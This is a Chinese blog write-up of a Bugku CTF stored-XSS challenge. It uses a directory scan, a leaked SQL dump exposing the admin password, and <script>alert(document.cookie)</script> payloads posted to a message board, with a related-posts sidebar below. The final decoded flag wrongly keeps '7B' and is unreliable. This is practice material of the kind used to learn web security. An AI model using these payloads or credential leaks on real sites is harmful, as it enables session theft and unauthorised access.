BUGKU 留言板

已于 2022-07-22 12:45:46 修改
阅读量2w 收藏 20
点赞数 13
分类专栏: 网络安全 渗透 文章标签: 网络安全
于 2022-07-22 12:08:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56313338/article/details/125929462
版权

这是一个关于存储型xss的题目

先进行目录扫描

使用dirsearch工具进行目录扫描

python dirsearch.py -u http://114.67.175.224:18392/

得到

/admin.php

/db.sql

访问http://114.67.175.224:18392/admin.php

发现管理员登录界面 

但是不知道用户名和密码

先不管这个,访问http://114.67.175.224:18392/db.sql

得到一个sql文件

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)

/*!40101 SET NAMES utf8 */;

#
# Structure for table "text"
#

CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; 

DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `text` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

#
# Data for table "text"
#

/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;

#
# Structure for table "user"
#

DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) DEFAULT NULL,
  `password` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

#
# Data for table "user"
#

/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以看到

INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

这不就是管理员的用户名和密码吗

试着登录

发现登录成功!

发现了我刚才留言的内容 

留言板写入

<script>alert(1)</script>

再访问管理员界面

 发现可以执行!

那我们构造一个获取cookie的js代码

看flag在不在里面

<script>alert(document.cookie)</script>

访问管理员界面

 得到flag

flag=flag%7B57845943ba8c6225d2fbade764481e8d%7D

%7B url编码为 {
%7D url编码为 }
最后的flag为
flag=flag{7B57845943ba8c6225d2fbade764481e8d}

bug小空
关注
  • 13
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku-web-留言板
m0_57954651的博客
10-31 4754
获取cookie的js代码 (alert(document.cookie))
【愚公系列】2023年06月 Bugku-Web(留言板
时光隧道
06-23 6993
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
Bugku-web-留言板
最新发布
qq_68457525的博客
06-20 263
ctf中关于xss跨站脚本漏洞的学习
Bugku——web
chongya927的博客
03-05 1334
菜鸟学习CTF之路
BUGKU-WEB 留言板
天泽岁月
02-07 1145
BUGKU-WEB 留言板
BugKu:Web
qq_50034496的博客
07-30 1729
BugKu:Web
bugkuCTF
Vincent0sen的博客
10-26 471
有时间再说,持续更新。
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BUGKU-WEB 留言板1
天泽岁月
02-18 1104
BUGKU-WEB 留言板1,xss双写绕过
Bugku-留言板
qq_56611811的博客
05-07 707
1.提示我们用xss平台接收flag2.通过xss.pt平台生成脚本,以插入图片形式将图片地址上传 3.回到xss平台可以看到接收到flag4.URL解码一下,拿到flag
Bugku-备份是个好习惯
qq_43622442的博客
05-12 409
Bugku-备份是个好习惯 http://123.206.87.240:8002/web16/ 1.看到一串md5,解密发现: 2.暂时用不上,看源码,看题目意思,扫一下目录: 3.下载下来看一下: 4.
bugku-ctf
weixin_53562844的博客
05-05 306
这里我也是试了这个平台的很多url,最后成功的是上面那个,可能是xss平台有些url用不了,又可能是我操作不当,反正多试几个,多试几次。dirsearch进行目录扫描,发现admin.php登录接口,默认用户名admin,但不知道密码,这里我利用不了。因为看到好多人都说没回显,就做一下记录,希望能帮到更多人。直接复制里面的代码,这里过滤空格和script。这里已经看到xss平台有回显了。
ctf bugku
weixin_51387754的博客
08-13 1901
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
留言板
weixin_53150482的博客
08-08 1582
留言板
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3114
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小写绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值